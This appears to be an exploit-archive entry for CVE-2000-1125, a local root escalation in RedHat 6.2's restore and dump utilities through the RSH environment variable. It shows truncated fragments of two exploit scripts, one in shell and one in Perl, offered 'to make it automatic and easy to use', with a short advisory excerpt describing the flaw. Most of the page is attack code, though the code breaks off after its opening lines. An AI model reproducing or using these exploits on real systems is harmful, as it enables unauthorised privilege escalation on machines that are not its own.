CVE-2000-1125

#!/bin/sh # # /sbin/restore exploit for rh62 # # I did not find this weakness my self, all i did was # writing this script (and some more) to make it # automatic and easy to use # # This exploit should work on all redhat 62 systems # with /sbin/restore not "fucked up" May work on other # distros too, but only tested successfully on rh62 # # ...

source: wwwsecurityfocuscom/bid/1914/info restore is a program for backup and recovery procedures, distributed with the RedHat Linux Operating System A vulnerability exists that could allow a user elevated permissions The problem occurs in the RSH environment variable restore is dependent upon this environment variable for execution ...

#!/usr/bin/perl # perl exploit of restore and dump # redhat linux 62 # written by tlabs # Use at your discretion $EXPORT1="TAPE=garbage:garbage" ; $EXPORT2="RSH=/hey" ; sub USAGE { print "$0 <type>\n1=dump 2=dumpstatic 3=restore 4=restorestaic\nYour choice innit;)\nWritten by Tlabs\n" ; exit 0 ; } sub ERROR { print "$_[0]\n" ; ...